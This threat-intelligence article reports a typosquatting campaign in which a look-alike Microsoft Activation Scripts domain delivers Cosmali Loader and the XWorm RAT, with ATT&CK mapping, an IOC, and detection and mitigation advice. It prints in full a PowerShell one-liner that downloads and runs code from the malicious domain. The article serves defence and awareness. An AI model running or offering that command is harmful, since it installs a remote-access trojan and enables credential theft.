Typo in Windows Activation Script Leads to Cosmali Loader Malware Infection

Typosquatted Domain Impersonating Microsoft Activation Scripts (MAS) Delivers Cosmali Loader and XWorm RAT

MEDIUM
December 27, 2025
4m read
MalwarePhishingThreat Actor

Related Entities

Organizations

Microsoft

Products & Tech

Microsoft Activation Scripts (MAS)PowerShell

Other

Cosmali LoaderXWorm RAT

MITRE ATT&CK Techniques

T1036.005Defense Evasion

Masquerading: Match Legitimate Name or Location

T1204.002Execution

User Execution: Malicious File

T1059.001Execution

Command and Scripting Interpreter: PowerShell

T1105Command and Control

Ingress Tool Transfer

T1547.001Persistence

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Full Report

Executive Summary

A clever typosquatting campaign is exploiting users of an unofficial but popular open-source tool, Microsoft Activation Scripts (MAS), to distribute malware. Researchers reported on December 26, 2025, that threat actors registered a domain, get.activate[.]win, that mimics the legitimate MAS domain by omitting a single letter. Users who make this common typo while executing the activation script in PowerShell are unknowingly infected with Cosmali Loader. This malware then deploys secondary payloads, including the XWorm Remote Access Trojan (RAT), granting attackers full remote control, and cryptocurrency mining software. The incident highlights the inherent risks of using grey-area tools and the effectiveness of typosquatting as a malware delivery vector.

Threat Overview

The attack preys on human error. The legitimate command to run the MAS script involves invoking a PowerShell command to download and execute a script from get.activated.win. The attackers registered get.activate.win (missing the 'd').

  • Attack Vector: Typosquatting, a form of social engineering that relies on users making typographical errors.
  • Execution: When a user runs the command irm https://get.activate.win | iex, they are not connecting to the official MAS project but to the attacker's server.
  • Payload: The server delivers the Cosmali Loader, which establishes persistence and then downloads further malware.
  • Final Stage: The loader deploys the XWorm RAT for remote control and a cryptominer for resource hijacking.

An unusual aspect of this campaign is that some victims reported receiving a pop-up window that stated, "You are infected with Cosmali Loader malware because you mistyped the domain name," and advised a full Windows reinstall. Security experts speculate this message was not from the attackers but from a vigilante hacker or researcher who compromised the malware's insecure command-and-control (C2) server and used it to warn victims.

Technical Analysis

  1. Initial Access & Execution (T1204.002 - User Execution): The user voluntarily executes the malicious command in PowerShell.
  2. Masquerading (T1036.005 - Match Legitimate Name or Location): The domain get.activate[.]win is designed to look nearly identical to the legitimate one, tricking the user.
  3. Ingress Tool Transfer (T1105): The irm (Invoke-RestMethod) command downloads the initial malware script from the malicious domain.
  4. Command and Scripting Interpreter (T1059.001 - PowerShell): The entire attack is initiated and executed via PowerShell, a powerful tool often abused by malware.
  5. XWorm RAT Capabilities: Once deployed, XWorm provides the attacker with full RAT capabilities, including keylogging, file transfer, remote shell access, and credential theft.

Impact Assessment

While targeting users of a legally questionable tool, the impact can still be severe. Once infected with XWorm RAT, the victim's machine is completely compromised. The attacker can:

  • Steal personal data, including banking credentials, social media passwords, and private files.
  • Use the compromised machine as part of a botnet for DDoS attacks or further malware distribution.
  • Hijack system resources to mine cryptocurrency, leading to high electricity costs and degraded performance.
  • If the machine is on a corporate network, the attacker can use it as a pivot point to attack other systems.

IOCs

Type Value Description
domain get.activate[.]win The malicious typosquatted domain used to distribute the malware.

Detection & Response

  1. DNS/Proxy Log Analysis: Monitor for any connections to the malicious domain get.activate[.]win. This is a high-fidelity indicator of compromise. This is an application of D3-UA: URL Analysis.
  2. PowerShell Script Block Logging: Enable PowerShell logging (Module Logging, Script Block Logging) to capture the commands being executed. Review logs for the use of irm or iex fetching scripts from suspicious or unknown domains.
  3. Endpoint Monitoring: Use an EDR solution to detect the behaviors of Cosmali Loader and XWorm RAT, such as creating persistence mechanisms (e.g., scheduled tasks, registry run keys) and injecting into legitimate processes.
  4. Network Monitoring: Monitor for C2 traffic associated with XWorm or unexpected outbound connections from newly installed software.

Mitigation

  1. User Education and Policy: The primary mitigation is to enforce policies against the use of illegal or unauthorized software and activation tools. Educate users on the risks associated with such tools, including malware infection.
  2. DNS Filtering/Web Security Gateway: Use a web security gateway to block access to known malicious and typosquatted domains. This would prevent the initial download of the malware. This is an example of D3-DNSDL: DNS Denylisting.
  3. Restrict PowerShell Usage: For standard user workstations, consider using PowerShell Constrained Language Mode to limit its ability to execute arbitrary scripts and commands. This is a form of D3-ACH: Application Configuration Hardening.
  4. Principle of Least Privilege: Ensure users do not have administrative privileges on their workstations. This can limit the malware's ability to establish persistence and deeply infect the system.

Timeline of Events

1
December 27, 2025
This article was published

MITRE ATT&CK Mitigations

User Training

M1017enterprise

Educate users about the dangers of typosquatting and the risks of using unauthorized software activation tools.

Restrict Web-Based Content

M1021enterprise

Use DNS filtering and web security gateways to block access to known malicious and typosquatted domains.

Mapped D3FEND Techniques:

D3-DNSDL

Execution Prevention

M1038enterprise

Use PowerShell Constrained Language Mode or other application control mechanisms to prevent the execution of arbitrary scripts.

Mapped D3FEND Techniques:

D3-ACH

D3FEND Defensive Countermeasures

DNS Denylisting

D3-DNSDLMaps to MITREM1021
D3FEND

To proactively block this attack vector, organizations should use a DNS filtering service or web security gateway that maintains a blocklist of known malicious and typosquatted domains. The domain get.activate[.]win should be immediately added to this list. These services can prevent the initial PowerShell command (irm) from ever reaching the attacker's server, breaking the infection chain at the earliest possible stage. This is a highly effective, low-overhead control that protects against a wide range of phishing and malware delivery campaigns, not just this specific one targeting MAS users.

Application Configuration Hardening

D3-ACHMaps to MITREM1054
D3FEND

Harden PowerShell configurations on user endpoints to prevent the execution of untrusted scripts. Deploy PowerShell Constrained Language Mode via Group Policy, which severely limits the commands and scripts that can be run. This would prevent the iex (Invoke-Expression) part of the attack from executing the downloaded malware script. Additionally, enforce a PowerShell execution policy of 'AllSigned' or 'RemoteSigned' to prevent arbitrary scripts from the internet from running. This hardening measure directly targets the execution phase of the attack and is a best practice for securing Windows environments against fileless malware and living-off-the-land attacks.

Security Banner

D3-SBCMaps to MITREM1017
D3FEND

While not a technical control in the same vein, the most fundamental mitigation is strong user education and acceptable use policies. Organizations must clearly prohibit the use of unauthorized software, cracks, and activation tools. Conduct security awareness training that specifically covers the dangers of typosquatting and social engineering. Explain that such tools are a primary vector for malware like Cosmali Loader and XWorm RAT. A user who understands the risk is less likely to seek out and execute these commands in the first place, thus avoiding the threat entirely. This cultural and policy-based control is the first line of defense.

Sources & References

Warning: Fake Domains Impersonating MAS Used to Trick Users into Installing Cosmali Loader Malware
ThaiCERT (thaicert.or.th) December 26, 2025
Top 5 Cybersecurity News Stories December 26, 2025
DieSec (diesec.com) December 26, 2025
New Cosmali Loader deployed via bogus MAS Windows activation domain
SC Magazine (scmagazine.com) December 26, 2025

Article Author

Jason Gomes

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & AnalysisSecurity Orchestration (SOAR/XSOAR)Incident Response & Digital ForensicsSecurity Operations Center (SOC)SIEM & Security AnalyticsCyber Fusion & Threat SharingSecurity Automation & IntegrationManaged Detection & Response (MDR)
LinkedIn

Tags

Cosmali LoaderXWorm RATTyposquattingMalwarePowerShellMicrosoft Activation Scripts

📢 Share This Article

Help others stay informed about cybersecurity threats

Continue Reading

Previous All Next